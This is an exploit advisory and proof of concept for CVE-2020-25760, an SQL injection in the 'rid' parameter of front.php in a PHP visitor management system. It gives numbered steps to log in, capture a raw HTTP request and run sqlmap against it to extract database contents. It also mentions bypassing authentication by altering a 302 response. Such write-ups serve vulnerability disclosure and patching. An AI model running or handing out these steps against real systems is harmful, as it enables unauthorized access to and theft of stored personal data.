# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25760 # Description The file front.php does not perform input validation on the 'rid' parameter. An attacker can append SQL queries to the input to extract sensitive information from the database. Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how. #POC 1) Navigate to the login page Example: http://192.168.1.72/visitor_management/index.php 2) Enter 'username' and 'password' 3) On the homepage, click on any visitor name and intercept the request 4) Save the request to file. Example, visitor_management_sqli.req GET /visitor_management/front.php?rid=373568 HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.72/visitor_management/front.php Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef Upgrade-Insecure-Requests: 1 5) Run SQLmap on the file, sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10